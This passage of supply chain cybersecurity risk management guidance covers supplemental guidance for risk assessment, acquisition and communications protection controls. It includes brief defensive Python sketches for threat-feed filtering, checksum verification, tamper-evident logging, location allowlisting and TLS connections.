Supplemental C-SCRM Guidance: Enterprises should integrate capabilities to respond to cybersecurity
risks throughout the supply chain into the enterprise’s overall response posture, ensuring that these
responses are aligned to and fall within the boundaries of the enterprise’s tolerance for risk. Risk response
should include consideration of risk response identification, evaluation of alternatives, and risk response
decision activities.
Level(s): 1, 2, 3
RA-9
CRITICALITY ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should complete a criticality analysis as a prerequisite input
to assessments of cybersecurity supply chain risk management activities. First, enterprises should complete
a criticality analysis as part of the Frame step of the C-SCRM Risk Management Process. Then, findings
generated in the Assess step activities (e.g., criticality analysis, threat analysis, vulnerability analysis, and
mitigation strategies) update and tailor the criticality analysis. A symbiotic relationship exists between the
criticality analysis and other Assess step activities in that they inform and enhance one another. For a high-
quality criticality analysis, enterprises should employ it iteratively throughout the SDLC and concurrently
across the three levels. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors. Departments and agencies should also refer to
Appendix F to supplement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 1, 2, 3
RA-10 THREAT HUNTING
Supplemental C-SCRM Guidance: The C-SCRM threat hunting activities should supplement the
enterprise’s internal threat hunting activities. As a critical part of the cybersecurity supply chain risk
management process, enterprises should actively monitor for threats to their supply chain. This requires a
collaborative effort between C-SCRM and other cyber defense-oriented functions within the enterprise.
Threat hunting capabilities may also be provided via a shared services enterprise, especially when an
enterprise lacks the resources to perform threat hunting activities itself. Typical activities include
information sharing with peer enterprises and actively consuming threat intelligence sources (e.g.,
those available from Information Sharing and Analysis Centers [ISACs] and Information Sharing and
Analysis Organizations [ISAOs]). These activities can help identify and flag indicators of increased
cybersecurity risks throughout the supply chain that may be of concern, such as cyber incidents, mergers
and acquisitions, and Foreign Ownership, Control, or Influence (FOCI). Supply chain threat intelligence
should seek out threats to the enterprise’s suppliers, as well as information systems, system components,
and the raw inputs that they provide. The intelligence gathered enables enterprises to proactively identify
and respond to threats emanating from the supply chain.
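As a simple illustration, the sketch below filters a consumed threat feed for items that mention the enterprise's suppliers. The feed records and supplier list are hypothetical; real ISAC/ISAO feeds use their own schemas and are subject to information sharing agreements.

feed = [  # hypothetical threat intelligence items
    {"id": "TI-001", "summary": "Ransomware incident at Acme Components"},
    {"id": "TI-002", "summary": "Phishing wave targeting finance sector"},
    {"id": "TI-003", "summary": "Acme Components announces acquisition by foreign investor"},
]

# Supplier names would come from the enterprise's system/supplier inventory.
suppliers = {"Acme Components", "Widget Labs"}

flagged = [item for item in feed
           if any(s.lower() in item["summary"].lower() for s in suppliers)]
for item in flagged:
    print("Supply chain relevant:", item["id"], "-", item["summary"])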
Level(s): 1, 2, 3
FAMILY: SYSTEM AND SERVICES ACQUISITION
[FIPS 200] specifies the System and Services Acquisition minimum security requirement as
follows:
Organizations must: (i) allocate sufficient resources to adequately protect
organizational information systems; (ii) employ system development life cycle
processes that incorporate information security considerations; (iii) employ software
usage and installation restrictions; and (iv) ensure that third-party providers employ
adequate security measures to protect information, applications, and/or services
outsourced from the organization.
Enterprises acquire ICT/OT products and services through system and services acquisition.
These controls address the activities of acquirers, suppliers, developers, system integrators,
external system service providers, other ICT/OT-related service providers, and related
upstream supply chain relationships. They address both the physical and logical aspects of
supply chain security, from detection to SDLC and security engineering principles. C-SCRM
concerns are already prominently addressed in [NIST SP 800-53, Rev. 5]. This document adds
further detail and refinement to these controls.
SA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The system and services acquisition policy and procedures should
address C-SCRM throughout the acquisition management life cycle process, to include purchases made via
charge cards. C-SCRM procurement actions and the resultant contracts should include requirements
language or clauses that address which controls are mandatory or desirable and may include
implementation specifications, state what is accepted as evidence that the requirement is satisfied, and how
conformance to requirements will be verified and validated. C-SCRM should also be included as an
evaluation factor.
Applicable procurements are not limited to those that are directly related to providing an
ICT/OT product or service. While C-SCRM considerations must be applied to such purchases, C-SCRM
should also be considered for any and all procurements of products or services in which there may be an
unacceptable risk that a supplied product or service provider could compromise the integrity, availability, or
confidentiality of an enterprise’s information. This initial assessment should occur during the acquisition
planning phase and will be minimally informed by an identification and understanding of the criticality of
the enterprise’s mission functions, its high value assets, and the sensitivity of the information that may be
accessible by the supplied product or service provider.
In addition, enterprises should develop policies and procedures that address supply chain risks that may
arise during contract performance, such as a change of ownership or control of the business or when
actionable information is learned that indicates that a supplier or a product is a target of a supply chain
threat. Supply chains evolve continuously through mergers and acquisitions, joint ventures, and other
partnership agreements. The policy should help enterprises understand these changes and use the obtained
information to inform their C-SCRM activities. Enterprises can obtain the status of such changes through,
for example, monitoring public announcements about company activities or any communications initiated
by suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
See Section 3 for further guidance on C-SCRM in the federal acquisition process. Additionally,
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
SA-2
ALLOCATION OF RESOURCES
Supplemental C-SCRM Guidance: The enterprise should incorporate C-SCRM requirements when
determining and establishing the allocation of resources.
Level(s): 1, 2
SA-3
SYSTEM DEVELOPMENT LIFE CYCLE
Supplemental C-SCRM Guidance: There is a strong relationship between the SDLC and C-SCRM
activities. The enterprise should ensure that C-SCRM activities are integrated into the SDLC for both the
enterprise and for applicable suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers. In addition to traditional SDLC activities, such as requirements
and design, the SDLC includes activities such as inventory management, acquisition and procurement, and
the logical delivery of systems and components. See Section 2 and Appendix C for further guidance on
SDLC. Departments and agencies should refer to Appendix F to implement this guidance in accordance
with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
SA-4
ACQUISITION PROCESS
Supplemental C-SCRM Guidance: Enterprises are to include C-SCRM requirements, descriptions, and
criteria in applicable contractual agreements.
1. Enterprises are to establish baseline and tailorable C-SCRM requirements to apply and incorporate
into contractual agreements when procuring a product or service from suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
These include but are not limited to:
a. C-SCRM requirements that cover regulatory mandates (e.g., the prohibition of certain
ICT/OT or suppliers), address identified and selected controls applicable to reducing the
cyber supply chain risk that may be introduced by a procured product or service, and
provide assurance that the contractor is sufficiently responsible, capable, and trustworthy.
b. Requirements for critical elements in the supply chain to demonstrate the capability to
remediate emerging vulnerabilities based on open source information and other sources.
c. Requirements for managing intellectual property ownership and responsibilities for elements
such as software code; data and information; the manufacturing, development, or integration
environment; designs; and proprietary processes when provided to the enterprise for review or
use.
d. Requirements that address the expected life span of the product or system, any element(s) that
may be in a critical path based on their life span, and what is required when end-of-life is near
or has been reached. Enterprises should conduct research or solicit information from bidders
or existing providers under contract to understand what end-of-life options exist (e.g., replace,
upgrade, or migrate to a new system).
e. Requirements that articulate any circumstances in which secondary market components may be
permitted.
f. Requirements for functional properties, configuration, and implementation information, as
well as any development methods, techniques, or practices that may be relevant. Identify and
specify C-SCRM evaluation criteria, to include the weighting of such criteria.
2. Enterprises should:
a. Establish a plan for the acquisition of spare parts to ensure adequate supply, and execute the
plan if or when applicable;
b. Establish a plan for the acquisition of alternative sources of supply as may be necessary
during continuity events or if/when a disruption to the supply chain occurs;
c. Work with suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers to identify and define existing and acceptable incident
response and information-sharing processes, including inputs on vulnerabilities from other
enterprises within their supply chains.
3. Establish and maintain verification procedures and acceptance criteria for delivered products and
services (a minimal verification sketch follows this list), which include but are not limited to:
a. Accepting COTS and GOTS products without verification, as authorized by the enterprise
(e.g., approved products lists)
b. Supplier validation of developmental and COTS software and hardware information system
vulnerabilities
4. Ensure that the continuous monitoring plan includes supply chain aspects in its criteria, such as
including the monitoring of functions, ports, and protocols in use. See Section 2 and Appendix C.
5. Ensure that the contract addresses the monitoring of suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers’ information
systems located within the supply chain infrastructure. Monitor and evaluate the acquired work
processes and work products where applicable. These include but are not limited to monitoring
software development infrastructure for vulnerabilities (e.g., DevSecOps pipelines, software
containers, and code repositories/shares).
6. Communicate processes for reporting information security weaknesses and vulnerabilities detected
during the use of ICT/OT products or services, and ensure reporting to appropriate stakeholders,
including OEMs where relevant.
7. Review and confirm sustained compliance with the terms and conditions of the agreement on an
ongoing basis.
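The verification sketch referenced in item 3 above: a minimal acceptance check that compares a delivered artifact's SHA-256 digest against a supplier-published value. The file name and digest are hypothetical placeholders; actual verification procedures and acceptance criteria would be defined contractually.

import hashlib

def sha256_of(path: str) -> str:
    # Stream the file so large deliveries do not need to fit in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

# Placeholder: the expected digest would be published by the supplier out-of-band.
published_digest = "0000000000000000000000000000000000000000000000000000000000000000"

actual_digest = sha256_of("delivered-component.tar.gz")  # hypothetical delivery
if actual_digest != published_digest:
    raise SystemExit("Acceptance FAILED: checksum mismatch; quarantine the delivery.")
print("Acceptance check passed:", actual_digest)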
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Related Controls: SA-4 (1), (2), (3), (6), and (7)
Control Enhancement(s):
ACQUISITION PROCESS | SYSTEM, COMPONENT, AND SERVICE CONFIGURATIONS
Supplemental C-SCRM Guidance: If an enterprise needs to purchase components, it needs to ensure
that the product specifications are “fit for purpose” and meet the enterprise’s requirements, whether
purchasing directly from the OEM, channel partners, or a secondary market.
Level(s): 3
ACQUISITION PROCESS | NIAP-APPROVED PROTECTION PROFILES
Supplemental C-SCRM Guidance: This control enhancement requires that the enterprise build,
procure, and/or use U.S. Government protection profile-certified information assurance (IA)
components when possible. NIAP certification can be achieved for OTS (COTS and GOTS).
Level(s): 2, 3
ACQUISITION PROCESS | CONTINUOUS MONITORING PLAN FOR CONTROLS
Supplemental C-SCRM Guidance: This control enhancement is relevant to C-SCRM and plans for
continuous monitoring of control effectiveness and should therefore be extended to suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers.
Level(s): 2, 3
SA-5
SYSTEM DOCUMENTATION
Supplemental C-SCRM Guidance: Information system documentation should include relevant C-SCRM
concerns (e.g., C-SCRM plan). Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 3
SA-8
SECURITY AND PRIVACY ENGINEERING PRINCIPLES
Supplemental C-SCRM Guidance: The following security engineering techniques are helpful for managing
cybersecurity risks throughout the supply chain.
a. Anticipate the maximum possible ways that the ICT/OT product or service can be misused or
abused in order to help identify how to protect the product or system from such uses. Address
intended and unintended use scenarios in architecture and design.
b. Design network and security architectures, systems, and components based on the enterprise’s risk
tolerance, as determined by risk assessments (see Section 2 and Appendix C).
c. Document and gain management acceptance and approval for risk that is not fully mitigated.
d. Limit the number, size, and privilege levels of critical elements. Using criticality analysis will aid
in determining which elements or functions are critical. See criticality analysis in Appendix C and
NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components.
e. Use security mechanisms that help to reduce opportunities to exploit supply chain cybersecurity
vulnerabilities, such as encryption, access control, identity management, and malware or
tampering discovery.
f. Design information system components and elements to be difficult to disable (e.g., tamper-
proofing techniques), and if they are disabled, trigger notification methods such as audit trails,
tamper evidence, or alarms (see the sketch following this list).
g. Design delivery mechanisms (e.g., downloads for software) to avoid unnecessary exposure or
access to the supply chain and the systems/components traversing the supply chain during
delivery.
h. Design relevant validation mechanisms to be used during implementation and operation.
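The sketch referenced in item f: one illustrative way to build a tamper-evident audit trail is a hash chain, in which each entry commits to its predecessor so that any later edit or deletion is detectable. This is an example technique under assumed data structures, not a mechanism required by this publication.

import hashlib
import json

def append_event(log: list, event: dict) -> None:
    # Each entry hashes its own content together with the previous entry's hash.
    prev = log[-1]["entry_hash"] if log else "0" * 64
    body = json.dumps({"prev": prev, "event": event}, sort_keys=True)
    log.append({"prev": prev, "event": event,
                "entry_hash": hashlib.sha256(body.encode()).hexdigest()})

def verify_chain(log: list) -> bool:
    prev = "0" * 64
    for entry in log:
        body = json.dumps({"prev": prev, "event": entry["event"]}, sort_keys=True)
        if entry["prev"] != prev or \
           entry["entry_hash"] != hashlib.sha256(body.encode()).hexdigest():
            return False  # any edit or deletion breaks every later hash
        prev = entry["entry_hash"]
    return True

log: list = []
append_event(log, {"component": "ctrl-board", "action": "disable_attempt"})  # hypothetical event
assert verify_chain(log)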
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
SA-9
EXTERNAL SYSTEM SERVICES
Supplemental C-SCRM Guidance: C-SCRM supplemental guidance is provided in the control
enhancements.
Control Enhancement(s):
(1)
EXTERNAL SYSTEM SERVICES | RISK ASSESSMENTS AND ORGANIZATIONAL APPROVALS
Supplemental C-SCRM Guidance: See Appendices C and D. Departments and agencies should refer to
Appendix E and Appendix F to implement guidance in accordance with Executive Order 14028 on
Improving the Nation's Cybersecurity.
Level(s): 2, 3
(2)
EXTERNAL SYSTEM SERVICES | ESTABLISH AND MAINTAIN TRUST RELATIONSHIP WITH PROVIDERS
Supplemental C-SCRM Guidance: Relationships with providers (in the context of this enhancement,
providers may include suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers) should meet the following supply chain security requirements:
a. The requirements definition is complete and reviewed for accuracy and completeness, including
the assignment of criticality to various components and defining operational concepts and
associated scenarios for intended and unintended use.
b. Requirements are based on needs, relevant compliance drivers, criticality analysis, and
assessments of cybersecurity risks throughout the supply chain.
c. Cyber supply chain threats, vulnerabilities, and associated risks are identified and documented.
d. Enterprise data and information integrity, confidentiality, and availability requirements are defined
and shared with the system suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers as appropriate.
e. The consequences of non-compliance with C-SCRM requirements and information system
security requirements are defined and documented.
f. There is a clear delineation of accountabilities, roles, and responsibilities between contractors
when multiple disparate providers are engaged in supporting a system or mission and business
function.
g. The requirements detail service contract completion and what defines the end of the relationship
with suppliers, developers, system integrators, external system service providers, or other
ICT/OT-related service providers. This is important for re-competition, a potential change in
provider, and managing system end-of-life processes.
h. Negotiated agreements are established for relationship termination to ensure safe and secure
termination, such as removing data from cloud environments.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
(3)
EXTERNAL SYSTEM SERVICES | CONSISTENT INTERESTS OF CONSUMERS AND PROVIDERS
Supplemental C-SCRM Guidance: In the context of this enhancement, “providers” may include
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
Level(s): 3
(4)
EXTERNAL SYSTEM SERVICES | PROCESSING, STORAGE, AND SERVICE LOCATION
Supplemental C-SCRM Guidance: The location may be under the control of the suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
Enterprises should assess C-SCRM risks associated with a given geographic location and apply an
appropriate risk response, which may include defining locations that are or are not acceptable and
ensuring that appropriate protections are in place to address associated C-SCRM risk.
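A minimal sketch of such a location check follows, assuming a hypothetical enterprise allowlist and provider service metadata. Which locations are acceptable is a risk-based decision for each enterprise, not something this publication prescribes.

# Hypothetical set of locations the enterprise has assessed as acceptable.
APPROVED_LOCATIONS = {"us-east", "us-west", "eu-central"}

provider_services = [  # hypothetical provider/service metadata
    {"provider": "ExampleCloud", "service": "object-storage", "location": "us-east"},
    {"provider": "ExampleCloud", "service": "backup", "location": "ap-south"},
]

for svc in provider_services:
    if svc["location"] not in APPROVED_LOCATIONS:
        print(f"RISK: {svc['provider']}/{svc['service']} in unapproved location "
              f"{svc['location']}; apply a risk response before use.")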
Level(s): 3
SA-10 DEVELOPER CONFIGURATION MANAGEMENT
Supplemental C-SCRM Guidance: Developer configuration management is critical for reducing
cybersecurity risks throughout the supply chain. By conducting configuration management activities,
developers reduce the occurrence and likelihood of flaws while increasing accountability and ownership for
the changes. Developer configuration management should be performed both by developers internal to
federal agencies and by integrators or external service providers. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-10 (1), (2), (3), (4), (5), and (6)
SA-11 DEVELOPER TESTING AND EVALUATION
Supplemental C-SCRM Guidance: Depending on the origins of components, this control may be
implemented differently. For OTS (off-the-shelf) components, the acquirer should conduct research (e.g.,
via publicly available resources) or request proof to determine whether the supplier (OEM) has performed
such testing as part of their quality or security processes. When the acquirer has control over the application
and development processes, they should require this testing as part of the SDLC. In addition to the specific
types of testing activities described in the enhancements, examples of C-SCRM-relevant testing include
testing for counterfeits, verifying the origins of components, examining configuration settings prior to
integration, and testing interfaces. These types of tests may require significant resources and should be
prioritized based on criticality, threat, and vulnerability analyses (described in Section 2 and Appendix C),
as well as the effectiveness of testing techniques. Enterprises may also require third-party testing as part of
developer security testing. Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Related Controls: SA-11 (1), (2), (3), (4), (5), (6), (7), (8), and (9)
SA-15 DEVELOPMENT PROCESS, STANDARDS, AND TOOLS
Supplemental C-SCRM Guidance: Providing documented and formalized development processes to guide
internal and system integrator developers is critical to the enterprise’s efforts to effectively mitigate
cybersecurity risks throughout the supply chain. The enterprise should apply national and international
standards and best practices when implementing this control. Using existing standards promotes
consistency of implementation, reliable and defendable processes, and interoperability. The enterprise’s
development, maintenance, test, and deployment environments should all be covered by this control. The
tools included in this control can be manual or automated. The use of automated tools aids thoroughness,
efficiency, and the scale of analysis that helps address cybersecurity risks that arise in relation to the
development process throughout the supply chain. Additionally, the output of such activities and tools
provides useful inputs for C-SCRM processes, as described in Section 2 and Appendix C. This control has
applicability to the internal enterprise’s processes, information systems, and networks as well as applicable
system integrators’ processes, systems, and networks. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Related Controls: SA-15 enhancements (1), (2), (5), (6), and (7)
Control Enhancement(s):
(1)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | CRITICALITY ANALYSIS
Supplemental C-SCRM Guidance: This enhancement identifies critical components within the
information system, which will help determine the specific C-SCRM activities to be implemented for
critical components. See C-SCRM Criticality Analysis described in Appendix C for additional context.
Level(s): 2, 3
(2)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | THREAT MODELING AND VULNERABILITY
ANALYSIS
Supplemental C-SCRM Guidance: This enhancement provides threat modeling and vulnerability
analysis for the relevant federal agency and contractor products, applications, information systems, and
networks. Performing this analysis will help integrate C-SCRM into code refinement and modification
activities. See the C-SCRM threat and vulnerability analyses described in Appendix C for additional
context.
Level(s): 2, 3
Related Control(s): SA-15(5), SA-15(6), SA-15(7)
(3)
DEVELOPMENT PROCESS, STANDARDS, AND TOOLS | REUSE OF THREAT AND VULNERABILITY
INFORMATION
Supplemental C-SCRM Guidance: This enhancement encourages developers to reuse the threat and
vulnerability information produced by prior development efforts and lessons learned from using the
tools to inform ongoing development efforts. Doing so will help determine the C-SCRM activities
described in Section 2 and Appendix C.
Level(s): 3
SA-16 DEVELOPER-PROVIDED TRAINING
Supplemental C-SCRM Guidance: Developer-provided training for external and internal developers is
critical to C-SCRM. It addresses training the individuals responsible for federal systems and networks to
include applicable development environments. Developer-provided training in this control also applies to
the individuals who select system and network components. Developer-provided training should include C-
SCRM material to ensure that 1) developers are aware of potential threats and vulnerabilities when
developing, testing, and maintaining hardware and software, and 2) the individuals responsible for selecting
system and network components incorporate C-SCRM when choosing such components. Developer
training should also cover training for secure coding and the use of tools to find vulnerabilities in software.
Refer to Appendix F for additional guidance on security for critical software.
Level(s): 2, 3
Related Controls: AT-3
SA-17 DEVELOPER SECURITY AND PRIVACY ARCHITECTURE AND DESIGN
Supplemental C-SCRM Guidance: This control facilitates the use of C-SCRM information to influence
system architecture, design, and component selection decisions, including security functions. Examples
include identifying components that compose system architecture and design or selecting specific
components to ensure availability through multiple supplier or component selections. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028
on Improving the Nation's Cybersecurity.
Level(s): 2, 3
Related Controls: SA-17 (1) and (2)
SA-20 CUSTOMIZED DEVELOPMENT OF CRITICAL COMPONENTS
Supplemental C-SCRM Guidance: The enterprise may decide, based on their assessments of cybersecurity
risks throughout the supply chain, that they require customized development of certain critical components.
This control provides additional guidance on this activity. Enterprises should work with suppliers and
partners to ensure that critical components are identified. Organizations should ensure that they have a
continued ability to maintain custom-developed critical software components. For example, having the
source code, build scripts, and tests for a software component could enable an organization to have
someone else maintain it if necessary.
Level(s): 2, 3
SA-21 DEVELOPER SCREENING
Supplemental C-SCRM Guidance: The enterprise should implement screening processes for their internal
developers. For system integrators who may be providing key developers that address critical components,
the enterprise should ensure that appropriate processes for developer screening have been used. The
screening of developers should be included as a contractual requirement and be a flow-down requirement to
relevant sub-level subcontractors who provide development services or who have access to the
development environment.
Level(s): 2, 3
Control Enhancement(s):
(1)
DEVELOPER SCREENING | VALIDATION OF SCREENING
Supplemental C-SCRM Guidance: Internal developer screening should be validated. Enterprises may
validate system integrator developer screening by requesting summary data from the system integrator
to be provided post-validation.
Level(s): 2, 3
SA-22 UNSUPPORTED SYSTEM COMPONENTS
Supplemental C-SCRM Guidance: Acquiring products directly from qualified original equipment
manufacturers (OEMs) or their authorized distributors and resellers reduces cybersecurity risks in the
supply chain. In the case of unsupported system components, the enterprise should use authorized resellers
or distributors with an ongoing relationship with the supplier of the unsupported system components.
When purchasing alternative sources for continued support, enterprises should acquire directly from vetted
original equipment manufacturers (OEMs) or their authorized distributors and resellers. Decisions about
using alternative sources require input from the enterprise’s engineering resources regarding the differences
in alternative component options. For example, if an alternative is to acquire an open source software
component, the enterprise should identify the open source community development, test, acceptance, and
release processes. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
FAMILY: SYSTEM AND COMMUNICATIONS PROTECTION
[FIPS 200] specifies the System and Communications Protection minimum security requirement
as follows:
Organizations must: (i) monitor, control, and protect organizational communications
(i.e., information transmitted or received by organizational information systems) at the
external boundaries and key internal boundaries of the information systems; and (ii)
employ architectural designs, software development techniques, and systems
engineering principles that promote effective information security within organizational
information systems.
An enterprise’s communications infrastructure is composed of ICT/OT components and systems,
which have their own supply chains. These communications allow users or administrators to
remotely access an enterprise’s systems and to connect to the internet, other ICT/OT within the
enterprise, contractor systems, and – occasionally – supplier systems. An enterprise’s
communications infrastructure may be provided and supported by suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers.
SC-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: System and communications protection policies and procedures should
address cybersecurity risks throughout the supply chain in relation to the enterprise’s processes, systems,
and networks. Enterprise-level and program-specific policies help establish and clarify these requirements,
and corresponding procedures provide instructions for meeting these requirements. Policies and procedures
should include the coordination of communications among and across multiple enterprise entities within the
enterprise, as well as the communications methods, external connections, and processes used between the
enterprise and its suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers.
Level(s): 1, 2, 3
SC-4
INFORMATION IN SHARED RESOURCES
Supplemental C-SCRM Guidance: The enterprise may share information system resources with system
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers. Protecting information in shared resources in support of various supply chain activities is
challenging when outsourcing key operations. Enterprises may either share too much and increase their risk
or share too little and make it difficult for suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers to be efficient in their service delivery. The
enterprise should work with developers to define a structure or process for information sharing, including
the data shared, the method of sharing, and to whom (the specific roles) the information is provided.
Appropriate privacy, dissemination, handling, and clearance requirements should be accounted for in the
information-sharing process.
Level(s): 2, 3
SC-5
DENIAL-OF-SERVICE PROTECTION
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance is provided in control
enhancement SC-5 (2).
Control Enhancement(s):
(2)
DENIAL-OF-SERVICE PROTECTION | CAPACITY, BANDWIDTH, AND REDUNDANCY
Supplemental C-SCRM Guidance: The enterprise should include requirements for excess capacity,
bandwidth, and redundancy into agreements with suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers.
Level(s): 2
SC-7
BOUNDARY PROTECTION
Supplemental C-SCRM Guidance: The enterprise should implement appropriate monitoring mechanisms
and processes at the boundaries between the agency systems and suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers’ systems. Provisions for
boundary protections should be incorporated into agreements with suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers. There may be
multiple interfaces throughout the enterprise, supplier systems and networks, and the SDLC. Appropriate
vulnerability, threat, and risk assessments should be performed to ensure proper boundary protections for
supply chain components and supply chain information flow. The vulnerability, threat, and risk
assessments can aid in scoping boundary protection to a relevant set of criteria and help manage associated
costs. For contracts with external service providers, enterprises should ensure that the provider satisfies
boundary control requirements pertinent to environments and networks within their span of control. Further
detail is provided in Section 2 and Appendix C. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors. Departments and
agencies should refer to Appendix F to implement this guidance in accordance with Executive Order
14028, Improving the Nation’s Cybersecurity.
Level(s): 2
Control Enhancement(s):
(1)
BOUNDARY PROTECTION | ISOLATION OF SECURITY TOOLS, MECHANISMS, AND SUPPORT
COMPONENTS
Supplemental C-SCRM Guidance: The enterprise should provide separation and isolation of
development, test, and security assessment tools and operational environments and relevant monitoring
tools within the enterprise’s information systems and networks. This control applies to the entity
responsible for creating software and hardware, to include federal agencies and prime contractors. As
such, this control applies to the federal agency and applicable supplier information systems and
networks. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. If a compromise or information leakage happens in
any one environment, the other environments should still be protected through the separation and
isolation mechanisms or techniques.
Level(s): 3
Related Controls: SR-3(3)
(2)
BOUNDARY PROTECTION | PROTECT AGAINST UNAUTHORIZED PHYSICAL CONNECTIONS
Supplemental C-SCRM Guidance: This control is relevant to C-SCRM as it applies to external service
providers.
Level(s): 2, 3
Related Controls: SR-3(3)
(3)
BOUNDARY PROTECTION | BLOCKS COMMUNICATION FROM NON-ORGANIZATIONALLY
CONFIGURED HOSTS
Supplemental C-SCRM Guidance: This control is relevant to C-SCRM as it applies to external service
providers.
Level(s): 3
SC-8
TRANSMISSION CONFIDENTIALITY AND INTEGRITY
Supplemental C-SCRM Guidance: The requirements for transmission confidentiality and integrity should
be integrated into agreements with suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers. Acquirers, suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers may repurpose existing
security mechanisms (e.g., authentication, authorization, or encryption) to achieve enterprise confidentiality
and integrity requirements. The degree of protection should be based on the sensitivity of information to be
transmitted and the relationship between the enterprise and the suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers. Enterprises should require
their prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
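For illustration only and not as part of the control language: a minimal Python sketch of one way to reuse an existing mechanism – TLS with certificate verification – to satisfy transmission confidentiality and integrity requirements. The host name is a hypothetical placeholder.

# Minimal sketch: TLS with certificate and host name verification (hypothetical host).
import socket
import ssl

context = ssl.create_default_context()             # verifies the server certificate chain by default
context.minimum_version = ssl.TLSVersion.TLSv1_2   # reject legacy protocol versions

host = "supplier-portal.example.gov"               # hypothetical supplier endpoint
with socket.create_connection((host, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=host) as tls:
        # The channel is now encrypted and integrity-protected, and the peer's
        # certificate and host name have been validated.
        print(tls.version())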
SC-18 MOBILE CODE
Supplemental C-SCRM Guidance: The enterprise should use this control in various applications of mobile
code within their information systems and networks. Examples include acquisition processes such as the
electronic transmission of supply chain information (e.g., email), the receipt of software components,
logistics information management using RFID, or transport sensor infrastructure.
Level(s): 3
Control Enhancement(s):
(1)
MOBILE CODE | ACQUISITION, DEVELOPMENT, AND USE
Supplemental C-SCRM Guidance: The enterprise should employ rigorous supply chain protection
techniques in the acquisition, development, and use of mobile code to be deployed in the information
system. Examples include ensuring that mobile code originates from vetted sources when acquired, that
vetted system integrators are used for the development of custom mobile code, and that verification
processes are in place for acceptance criteria prior to installation in order to verify the
source and integrity of code. Note that mobile code can be both code for the underlying information
systems and networks (e.g., RFID device applications) or for information systems and components.
Level(s): 3
SC-27 PLATFORM-INDEPENDENT APPLICATIONS
Supplemental C-SCRM Guidance: The use of trusted platform-independent applications is essential to C-
SCRM. The enhanced portability of platform-independent applications enables enterprises to switch
external service providers more readily in the event that one becomes compromised, thereby reducing
vendor-dependent cybersecurity risks. This is especially relevant for critical applications on which multiple
systems may rely.
Level(s): 2, 3
SC-28 PROTECTION OF INFORMATION AT REST
Supplemental C-SCRM Guidance: The enterprise should include provisions for the protection of
information at rest into their agreements with suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. The enterprise should also ensure that they
provide appropriate protections within the information systems and networks for data at rest for the
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers’ information, such as source code, testing data, blueprints, and intellectual property
information. This control should be applied throughout the SDLC, including during requirements,
development, manufacturing, test, inventory management, maintenance, and disposal. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors. Departments and agencies should refer to Appendix F to implement this guidance in
accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: SR-3(3)
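For illustration only: a minimal Python sketch of authenticated encryption for supplier-provided information at rest. It assumes the third-party cryptography package; in practice, key generation, storage, and access would be governed by the enterprise’s key management processes.

# Minimal sketch: authenticated encryption of data at rest (assumes the
# third-party "cryptography" package: pip install cryptography).
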